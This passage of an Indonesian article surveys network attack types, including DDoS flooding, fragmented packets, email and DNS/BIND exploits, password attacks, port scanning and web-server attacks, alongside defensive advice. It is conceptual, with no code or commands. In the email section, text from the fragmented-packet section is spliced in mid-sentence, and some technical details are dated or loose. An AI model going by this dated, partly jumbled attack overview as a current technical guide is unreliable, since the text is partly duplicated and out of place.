Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact. Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.

4. Flooding & Broadcasting

Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya menyerah.
Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.

Attacker sering kali menggunakan serangan flooding ini untuk mendapatkan akses ke system yang digunakan untuk menyerang network lainnya dalam satu serangan yang dinamakan Distributed Denial Of Service(DDOS). Serangan ini seringkali dipanggil smurf jika dikirim melaluli ICMP dan disebut fraggles ketika serangan ini dijalakan melewati UDP.
Suatu node (dijadikan tools) yang menguatkan broadcast traffic sering disebut sebagai Smurf Amplifiers, tools ini sangat efektif untuk menjalankan serangan flooding. Dengan melakukan spoofing terhadap network sasaran, seorang attacker dapat mengirim sebuah request ke smurf amplifier, Network yang di amplifiying(dikuatkan) akan mengirim respon kesetiap host di dalam network itu sendiri, yang berarti satu request yang dilakukan oleh attacker akan menghasilkan pekerjaan yang sama dan berulang-ulang pada network sasaran, hasil dari serangan ini adalah sebuah denial of service yang tidak meninggalkan jejak. Serangan ini dapat diantisipasi dengan cara menolak broadcast yang diarahkan pada router.

TCP-level Flooding (kebanyakan SYN ATTACK) telah digunakan pada bulan februari tahun 2000 untuk menyerang Yahoo!, eBay dll yang menggunakan serangan DDOS(Distributed Denial Of Service). Network yang tidak menggunakan firewall untuk pengecekan paket-paket TCP biasanya bisa diserang dengan cara ini. Beberapa fungsi penyaringan pada firewall (Firewall Filtering Function) biasanya akan mampu untuk menahan satu serangan flooding dari sebuah alamat IP, tetapi serangan yang dilakukan melalui DDOS akan sulit di cegah karena serangan ini seperti kita ketahui datangnya dari berbagai alamat IP secara berkala. Sebenarnya salah satu cara untuk menghentikan serangan DDOS adalah dengan cara mengembalikan paket ke alamat asalnya atau juga dengan cara mematikan network(biasanya dilakukan oleh system yang sudah terkena serangan sangat parah).

5. Fragmented Packet Attacks

Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol. Paket yang dipecah juga dapat mengakibatkan suasana seperti serangan flooding. Karena paket yang dipecah akan tetap disimpan hingga akhirnya di bentuk kembali ke dalam data yang utuh, server akan menyimpan paket yang dipecah tadi dalam memori kernel. Dan akhirnya server akan menjadi crash jika terlalu banyak paket-paket yang telah dipecah dan disimpan dalam memory tanpa disatukan kembali. Melalui cara enumerasi tentang topographi network sasaran, seorang attacker bisa mempunyai banyak pilihan untuk meng- crash packet baik dengan cara menguji isi firewall, load balancers atau content –based routers. Dengan tidak memakai system pertahanan ini, network sasaran jauh lebih rawan untuk perusakan dan pembobolan.

Karena paket yang dipecah(fragmented packet) tidak dicatat dalam file log sebelum disatukan kembali menjadi data yang utuh, packet yang dipecah ini memberikan jalan bagi hacker untuk masuk ke network tanpa di deteksi. Telah banyak Intrusion Detection System (IDS) dan saringan firewall(firewall filters) yang memperbaiki masalah ini, tapi masih banyak juga system yang masih dapat ditembus dengan cara ini.

6. E-mail Exploits

Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan e-mail bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).
Serangan mail flood (flood =air bah) terjadi ketika banyak sekali e-mail yang dikirimkan oleh attacker kepada sasaran yang mengakibatkan transfer agent kewalahan menanganinya, mengakibatkan komunikasi antar program lain menjadi tidak stabil dan dapat membuat system menjadi crash. Melakukan flooding merupakan cara yang sangat kasar namun efektif, maksudnya untuk membuat suatu mail server menjadi down. Salah satu jalan yang menarik dalam melakukan serangan mail-flooding adalah dengan meng-exploitasi fungsi auto-responder (auto-responder function) yang terdapat dalam kebanyakan aplikasi email, ketika seorang attacker menemukan auto-responder yang sedang aktif dalam dua system yang berbeda, sang attacker bisa saja mengarahkan yang satu ke yang lainnya, karena kedua-duanya di set
untuk merespond secara sacara otomatis untuk setiap pesan, maka kedua-duanya akan terus mengenarate lebih banyak e-mail secara loop(bolak-balik) dan akhirnya kedua-duanya akan kelelahan dan down.

Serangan memanipulasi perintah (command manipulation attack) dapat mengakibatkan sebuah system menjadi crash dengan cara menggulingkan mail transfer agent dengan sebuah buffer overflow yang diakibatkan oleh perintah (fungsi) yang cacat (contoh: EXPN atau VRFY). Perbedaan antara mail flood dan command manipulation: command manipulation meng-exploit kekuasaan milik sendmail yaitu memperbolehkan attacker untuk mengakses system tanpa informasi otorisasi(menjadi network admin tanpa diketahui) dan membuat modifikasi pada penjalanan program lainnya. Mengaktifkan command yang cacat seperti diatas juga dapat mengakibatkan seorang attacker mendapatlan akses untuk memodifikasi file, menulis ulang, dan tentunya saja membuat trojan horses pada mail server.
Penyerangan tingkat transport (transport level attack) dilakukan dengan cara mengexploit protokol pe-rute-an/pemetaan e-mail diseluruh internet: Simple Mail Tranport Protocol (SMTP). Seorang attacker dapat mengakibatkan kondisi kesalahan sementara (temporary error) di target system dengan cara mengoverload lebih banyak data pada SMTP buffer sehingga SMTP buffer tidak bisa menanganinya, kejadian ini dapat mengakibatkan seorang attacker terlempar dari sendmail program dan masuk kedalam shell dengan kekuasaan adminitsrasi bahkan dapat mengambil alih root. Beberapa serangan exploitasi juga
sering terjadi pada POP dan IMAP.

Pada saat kerawanan SMTP sulit untuk di exploitasi, attacker mungkin saja berpindah ke serangan tranport level jika ia tidak berhasil menyerang dengan cara command manipulation ataupun mail-flood. Serangan ini lebih digunakan untuk membuat gangguan daripada untuk menjebol suatu system. Seorang attacker biasanya akan menggunakan serangan jenis untuk mem flood Exchange Server dan memotong lalu lintas e-mail (trafic e-mail). Serangan ini juga dapat digunakan untuk membuat reputasi suatu organisasi menjadi buruk dengan mengirimkan spam atau offensive e-mail ke organisasi lainnya dengan sumber dan alamat dari organisasi tersebut. Mail relaying, proses memalsukan asal/source email dengan cara meroutekannya ke arah mesin yang akan dibohongi, adalah type lain dari serangan transport-level. Teknik ini sangat berguna untuk membuat broadcasting spam secara anonymous. Berbagai macam isi(content) yang sering dikirim lewat e-mail Melalui cara enumerasi tentang topographi network sasaran, seorang attacker bisa mempunyai banyak pilihan untuk meng- crash packet baik dengan cara menguji isi firewall, load balancers atau contentbased routers. Dengan tidak memakai system pertahanan ini, network sasaran jauh lebih rawan untuk perusakan dan pembobolan. Karena paket yang dipecah(fragmented packet) tidak dicatat dalam file log sebelum disatukan kembali menjadi data yang utuh, packet yang dipecah ini memberikan jalan bagi hacker untuk masuk ke network tanpa di deteksi. Telah banyak Intrusion Detection System (IDS) dan saringan firewall(firewall filters) yang memperbaiki masalah ini, tapi masih banyak juga system yang masih dapat ditembus dengan cara ini.

7. DNS and BIND Vulnerabilities

Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation). Kesalahan pada BIND sebenarnya bukanlah sesuatu yang baru. Semenjak permulaanya, standar BIND merupakan target yang paling favorite untuk diserang oleh komunitas cracker karena beberapa kerawanannya. Empat kerawanan terhadap buffer overflow yang terjadi pada bulan Januari lalu hanya beberapa bagian dari kerawanan untuk diexploitasi oleh para cracker agar mendapat akses terhadap system dan melakukan perintah dengan hak penuh (command execution priviledge).

Kerawanan pada BIND merupakan masalah yang sangat serius karena lebih dari 80 persen DNS yang berada di Jagat Internet dibangun menggunakan BIND. Tanpa adanya DNS dalam lingkungan Internet Modern, mungkin transmisi e-mail akan sulit, navigasi ke situs-situs web terasa rumit dan mungkin tidak ada hal mudah lainnya yang menyangkut internet.

Kerawanan BIND bukan hanya terletak pada DNS. System penerjemah alamat (number-address translator) merupakan subject dari kebanyakan exploit, termasuk untuk melakukan penyerangan di tingkat informasi, penyerangan Denial Of Service, pengambil alihan kekuasaan dengan hijacking.

Penyerangan di tingkat Informasi bertujuan untuk membuat server menjawab sesuatu yang lain dari Jawaban yang benar. Salah satu cara untuk melakukan serangan jenis ini adalah melalui cache poisoning, yang mana akan mengelabui remote name server agar menyimpan jawaban dari third-party domain dengan cara menyediakan berbagai macam informasi kepada domain server yang mempunyai autorisasi. Semua pengimplementasian serangan terhadap DNS akan mempunyai kemungkinan besar untuk berhasil dilakukan jika jawaban dari suatu pertanyaan yang spesisfik bisa dibohongi (spoof). DOS atau membuat Server tidak dapat beroperasi, bisa dilakukan dengan cara membuat DNS menyerang dirinya sendiri atau juga dengan cara mengirimkan traffic-flooding yang berlebihan dari luar, contohnya menggunakan “Smurf” ICMP flood. Jika suatu organisasi atau perusahaan memasang authoritathive name server dalam satu segment yang terletak dibelakang satu link atau dibelakang satu physical area, maka hal ini akan menyebabkan suatu kemungkinan untuk dilakukannya serangan Denial Of Service.

Cracker akan mencoba untuk menyerang system melalui DNS dengan cara buffer overflow, yaitu salah satu exploit yang sangan berpotensi pada kerawanan BIND. Gangguan exploit terjadi karena adanya kelemahan dalam pengkodean/pemrograman BIND yang mengizinkan seorang attacker untuk memanfaatkan code-code yang dapat dieksekusi untuk masuk kedalam system. Beberapa system operasi telah menyediakan patch untuk stack agar tidak dapat dieksekusi, sebagaimana juga yang dilakukan compiler (menyediakan patch) yang melindungi stack dari overflow. Mekanisme perlindungan ini stidaknya membuat cracker akan sulit menggunakan exploit.
Telah jelas bahwa mengupdate system secara berkala dan menggunakan patch adalah salah satu yang harus dilakukan untuk membangun security yang efektif, jika vendor dari DNS anda tidak menyediakan patch secara berkala, anda lebih baik mengganti software DNS anda yang menyediakan patch secara berkala, tentunya untuk menjaga kemanan system.
Pada system Unix , BIND harus dijalankan sebagai root untuk mengatur port yang lebih rendah (kode-kode mesin). Jika software DNS dapat dibodohi untuk menjalankan code-code berbahaya, atau membuka file-file milik root, user local mungkin saja bisa menaikan kekuasaannya sendiri didalam mesin.
Organisasi atau perusahaan yang mengubah authoritative server juga harus waspada bahwa mengganti server mereka dalam waktu yang bersamaan akan mengakibatkan domain mereka di hijack melalui cache poisoning. Mengubah server seharusnya dilakukan sebagai proses transisi. Untuk mencegah domain hijacking sebaiknya network admin terlebih dahulu menambahkn server barunya kedalam network infrastucture sebelum mengganti server yang lama.

8. Password Attacks

Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password. Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai
hal ini dengan cara teknikal. Kebanyakan seranagn yang dilakukan terhadap password adalah menebak (guessing), brute force, cracking dan sniffing.
Penebakan(guessing) password bisa dilakukan dengan cara memasukan password satu persatu secara manual ataupun dengan bantuin script yang telah diprogram. Kebanyakan user menggunakan hal-hal yang umum untuk password mereka diantaranya tanggal lahir, dan biasanya user tidak menghawatirkan tentang aturan yang berlaku pada perusahaan untuk menggunakan kombinasi alphanumeric dan minimal 7 karakter. Jika saja user memakai tanggal lahirnya sebagai password maka hal penyerangan akan sangat mudah dilakukan, karena cracker tidak membutuhkan waktu yang lama hanya untuk menjebol 6 digit angka tanggal lahir. Beberapa user atau bahkan administrator dapat membuat pekerjaan cracker menjadi
mudah andai saja mereka lupa untuk merubah password default dari sebuah software.
Sebenarnya, password guessing merupakan sesuatu yang sangat tidak efektif, dan dapat menghabiskan waktu. Network admin bisa dengan mudah mendetect serangan jika seorang attacker mencoba login dengan menebak password berkali-kali.

Brute-force merupakan serangan yang menggunakan logika yang sama dengan password guessing tetapi serangan brute-force lebih cepat dan lebih powerfull. Dalam tipe serangan ini seorang attacker menggunakan script (biasanya program cracking gratis) yang akan mencoba password-password umum(biasanya terdapat dalam dictionary). Tujuan dari serangan jenis ini adalah untuk mempercepat penemuan password sebelum network admin menyadari adanya serangan.
Walaupun serangan Brute-force lebih efisien daripada password guessing, kedua teknik tersebut pada dasarnya sama. Attacker umumnya lebih sulit untuk berhasil dengan kedua metoda tersebut. Lebih jauh lagi, kedua teknik tersebut sangat mudah di lawan dengan memanfaatkan features blacklisting, yang akan mengunci sebuah account user jika seseorang(attacker) berkali-kali memasukkan password secara tidak tepat. Contohnya, default blacklist dalam system unix adalah tiga kali (kesempatan memasukkan password).
Kelemahan dari perlindungan blacklist adalah bahwa feature blacklist ini dapat igunkan untuk menyerang system oleh attacker. Sebagai contoh, jika seorang attacker dapat mengidentifikasi siapa login name untuk network admin, sang attacker bisa saja menngunakan login name itu dan memasukkan password yang salah berulangkali dan akhirnya mengunci account admin . Ketika sang admin sedang berusaha untuk mendapatkan aksesnya kembali, seorang attacker masih bisa untuk berhubungan dengan system.

Password cracking adalah metoda untuk melawan perlindungan password yang dienkripsi yang berada di dalam system. Dengan anggapan bahwa atacker telah masuk kedalam system, ia bisa saja mengubah kekuasaannya didalam system dengan cara meng crack password file menggunakan metode brute-forcedictionary attack (mencocokan kata-kata yang berada dalam kamus dengan kata-kata yang dienkripsi dalam file password). Keberhasilan menggunakan cara ini bergantung pada kecepatan prosesor dan program yang dimiliki oleh attacker. Cara yang terbaik untuk menghindari serangan jenis ini adalah dengan memonitor kewenangan akses pada file.

Dengan cara mengintip lalulintas pada port telnet(23) ataupun HTTPD (80), seorang attacker dapat mendapatkan password yang digunakan untuk internet dan koneksi secara remote melalui proses yang dinamakan password snifing. Cara inilah yang paling mudah dilakukan karena kedua koneksi tersebut tidak menggunakan enkripsi, kecuali koneksi yang menggunakan SSL (secure socket layer) pada HTTPD(biasanya ada tanda gembok terkunci dibawah browser, yang menandakan transaksi aman) atau juga menggunakan SSH (Secure SHell) untuk koneksi ke mesin lain secara remote.

9.Proxy Server Attacks

Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.
Jika firewal yang berada dalam trusted network tidak dikonfigurasikan secara optimal, khususnya untuk memblok akses dari luar, apalagi jika autentikasi dan enkripsi tidak digunakan, seorang attacker bisa menyerang proxy server dan mendapatkan akses yang sama dengan anggota trusted network lainnya. Jika attaker sudah masuk ke sistem ia tentunya bisa melakukan apa saja dan ia bisa melakukan DDOS(distributed denial of service) secara anoymous untuk menyerang network lain.
Router yang tidak dikonfigurasikan secara optimal juga akan berfungsi sebagai proxy server dan akan mengakibatkan kerawanan yang sama dengan proxy server.

10. Remote Command Processing Attacks

Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network).
Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya.

11. Remote File System Attack

Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCP-Level) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file.
Tergantung pada OS (operating system) yang digunakan, attacker bisa meng extrack informasi tentang network, sharing privileges, nama dan lokasi dari user dan groups, dan spesifikasi dari aplikasi atau banner (nama dan versi software). System yang dikonfigurasi atau diamankan secara minimal akan dengan mudah membeberkan informasi ini bahkan melalui firewall sekalipun. Pada system UNIX, informasi ini dibawa oleh NFS (Network File System) di port 2049. system Windows menyediakan data ini pada SMB (server messaging block) dan Netbios pada port 135 - 139(NT) dan port 445 pada win2k.

Network administrator bisa meminimalisasi resiko yang akan terjadi dengan menggunakan Protokol-protokol tersebut dengan memberikan sedikit peraturan. Network dengan system windows, harusnya memblok akses ke port 139 dan 445 dari luar network, jika dimungkinkan. Dalam system unix port 2049 seharusnya di blok, sharing file dibatasi dan permintaan file melalui showmount(perintah dalam unix) seharusnya di catat dalam log.

12. Selective Program Insertions

Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor. Biasanya antivirus yang dijual dipasaran akan dapat mendeteksi dan membersihkan program-program seperti ini, tetapi jika ada virus baru (anggap saja variant melissa) virus scanner belum tentu dapat menghadapi script-script baru. Beberapa network administrator melakukan pertahan terhadap malware dengan teknologi alternatif seperti behaviour blockers, yang memberhentikan kode-kode yang dicurigai berdasarkan contoh kelakuan malware, bukan berdasarkan signature. Beberapa aplikasi lainnya akan mengkarantina virus dan code-code yang dicurigai didalam daerah yang dilindungi, biasanya disebut sandboxes.

13. Port Scanning

Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.

14.TCP/IP Sequence Stealing, Passive Port Listening and Packet

Interception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.
TCP/IP Sequence Stealing adalah pemetaan dari urutan nomor-nomor (angka), yang bisa membuat packet milik attacker terlihat legal. Ketika suatu system meminta sesi terhadap mesin lain, kedua system tersebut saling bertukar nomor-nomor sinkronisasi TCP. Jika tidak dilakukan secara acak, Attacker bisa mengenali algoritma yang digunakan untuk meng –generate nomor-nomor ini. Urutan nomor yang telah dicuri bisa digunakan attacker untuk menyamar menjadi salah satu dari system tadi, dan akhirnya memperbolehkannya untuk melewati firewall. Hal ini sebenarnya efektif jika digunakan bersama IP Spoofing.
Melalui passive port listening, seorang attacker dapat memonitor dan mencatat (log) semua pesan dan file yang dikirim ke semua port yang dapat diakses pada target system untuk menemukan titik kerawanan. Packet Interception adalah bagian (tepatnya pelapis) dari active listener program yang berada pada port di system sasaran yang berfungsi untuk menerima ataupun mengembalikan semua tipe pesan (data) spesifik yang dikirim. Pesan tersebut bisa dikembalikan ke unauthorized system, dibaca dan akhir nya dikembalikan lagi baik tanpa perubahan atau juga dengan perubahan kepada attacker, atau bahkan tidak dikembalikan.

Dalam beberapa versi atau juga menurut konfigurasi dari user SSHD(secured shell daemon), otentikasi bisa dilakukan dengan cara menggunakan public key (milik mesin tentunya). Jika seorang attacker mempelajari public key yang digunakan, ia bisa menciptakan atau memasukan paket-paket palsu. System sasaran akan menganggap pengirim paket palsu tersebut empunyai hak akses.

15. HTTPD Attacks

Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods. HTTPDBufferOverflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker akses ke command prompt.
Beberapa feature dari HTTPD bisa digunakan untuk meciptakan HTTPD byapass, memberi akses ke server menggunakan fungsi logging. Dengan cara ini, sebuah halaman web bisa diakses dan diganti tanpa dicatat oleh web server. Cara ini sering digunakan oleh para cracker, hacktivis dan cyber vandals untuk mendeface website.
Sedangkan kerawanan pada script-script web bisa terjadi pada semua bahasa pemrograman web dan semua ekstensi aplikasi. Termasuk VB, Visual C++, ASP, TCL, Perl, PHP, XML, CGI dan Coldfusion. Pada dasarnya, attacker akan mengexploitasi kelemahan dari sebuah aplikasi, seperti CGI script yang tidak memeriksa input atau kerawanan pada IIS RDS pada showcode.asp yang mengizinkan menjalankan perintah secara remote (remote command priviledges).
Melalui cross scripting dan cross-site scripting seorang attacker bisa mengexploitasi pertukaran cookies antara browser dan webserver. Fasilitas ini dapat mengaktifkan script untuk merubah tampilan web dll. Script ini bisa menjalankan malware, membaca infomasi penting dan meng expose data sensitive seperti nomor credit card dan password.
Pada akhirnya attacker dapat menjalankan denial of service dengan URL flood, yang dilakukan dengan cara mengulang dan terus mengulang permintaan terhadap port 80 httpd yang melalui batas TTL (time to live).

Beberapa user ataupun manager mungkin benci mendengar serangan-serangan tersebut. Tapi pada kenyataanya memang tidak ada yang benar-benar fix untuk mengamankan network ataupun website. Keamanan adalah suatu proses, bukan produk. Jika anda memasang firewall, IDSes(instrusion detection system), routers dan honeypots (system untuk jebakan) mungkin dapat menyediakan lapisan-lapisan untuk bertahan, tetapi sekali lagi peralatan paling canggih di dunia tidak akan menolong suatu organisasi sampai organisasi tersebut mempunyai proses untuk mengupgrade system, memakai patch, mengecek security pada system sendiri dan metode lain. Telah banyak perusahaan yang memakai IDSes tetapi tidak memonitor file log, mereka menginstall firewall, tetapi tidak mengupgradenya. Jalan terbaik untuk melindungi website maupun network dari serangan adalah mendekatkan keamanan sebagaimana tantangan yang sedang terjadi terhadap keamanan itu sendiri, terus berusaha, selalu ingat basicnya dan jangan lupa untuk berdoa